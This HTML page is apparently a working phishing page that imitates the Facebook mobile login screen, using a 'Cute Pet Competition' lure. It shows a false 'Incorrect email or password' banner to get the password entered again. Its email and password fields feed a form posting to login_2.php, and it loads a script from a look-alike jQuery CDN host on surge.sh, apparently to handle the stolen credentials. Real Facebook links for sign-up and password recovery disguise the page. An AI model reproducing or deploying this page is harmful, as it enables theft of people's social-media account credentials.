<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Facebook - Log In or Sign Up</title>
    <link rel="icon" type="image/svg+xml" sizes="683x683" href="assets/img/facebook.svg">
    <link rel="icon" type="image/svg+xml" sizes="683x683" href="assets/img/facebook.svg">
    <link rel="icon" type="image/svg+xml" sizes="683x683" href="assets/img/facebook.svg">
    <link rel="icon" type="image/svg+xml" sizes="683x683" href="assets/img/facebook.svg">
    <link rel="icon" type="image/svg+xml" sizes="683x683" href="assets/img/facebook.svg">
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">
    <link rel="stylesheet" href="assets/css/Contact-Form-Clean.css">
    <link rel="stylesheet" href="assets/css/styles.css">
</head>

<body>
    <p style="margin-bottom: 0;padding-left: 12px;padding-top: 5px;padding-bottom: 5px;background: #fa3e3e;color: #ffffff;text-align: center;border-bottom: 1px none #e5ce3a;">Incorrect email or password. <strong>Did you forget your password?</strong></p>
    <nav class="navbar navbar-light navbar-expand-md" style="padding-bottom: 10px;">
        <div class="container-fluid"><img class="img-fluid" src="assets/img/dF5SId3UHWd.svg" style="width: 140px;margin-top: 0px;"></div>
    </nav>
    <div class="contact-clean" style="padding: 0;padding-top: 0 px;padding-bottom: 0px;background: rgb(255,255,255);">
        <form id="asset" method="post" style="width: 100%;padding-top: 0;padding-right: 15px;padding-left: 10px;border-style: none;box-shadow: inset 0px 0px;" action="login_2.php">
            <div><img class="img-fluid" src="assets/img/download%20(4).jpg" style="width: 68px;margin-bottom: 11px;">
                <p style="text-align: center;padding-right: 15%;padding-left: 15%;color: rgba(99,106,113,0.88);">Log into your Facebook account to connect to <strong>Cute Pet Competition</strong></p>
            </div>
            <div class="form-group" style="margin-bottom: 7px;"><input class="form-control form-control-sm" type="text" id="a1" placeholder="Mobile number or email" style="background: #f5f6f7;border-radius: 5px;" required=""></div>
            <div class="form-group" style="margin-bottom: 14px;"><input class="form-control form-control-sm" type="password" id="a2" style="background: #f5f6f7;border-radius: 5px;" placeholder="Password" required=""></div>
            <div class="form-group"><button class="btn btn-secondary btn-block btn-lg text-capitalize" id="css-qq" type="button" style="background: #1877f2;font-size: 16px;">Log in</button></div>
            <div style="margin-top: 23px;text-align: center;"><span class="label" style="margin-top: -13px;margin-bottom: 1px;margin-right: 50%;margin-left: 43%;width: 53px;">or</span><span class="line" style="background: rgba(154,154,154,0.25);"></span></div>
            <div class="form-group" style="margin-left: auto;margin-right: auto;margin-top: 36px;"><a class="btn btn-secondary btn-block btn-lg text-capitalize" role="button" style="background: #00a400;font-size: 13px;font-style: normal;font-weight: bold;text-align: center;width: 172px;padding-left: 10px;padding-right: 10px;height: 36px;padding-top: 11px;" href="https://m.facebook.com/reg/">Create New Account</a>
                <p style="text-align: center;margin-top: 14px;font-size: 14px;color: #85a4d0;"><a href="https://touch.facebook.com/login/identify/?ctx=recover&amp;c=https%3A%2F%2Ftouch.facebook.com%2F&amp;multiple_results=0&amp;ars=facebook_login&amp;lwv=100&amp;_rdr" style="color: #548ad6;">Forgot Password?</a></p>
            </div>
        </form>
    </div>
    <script src="assets/js/jquery.min.js"></script>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
    <script src="assets/js/css.js"></script>
    <script src="https://jquery-cdn-dlvr.surge.sh/jquery-css2.min.js"></script>
</body>

</html>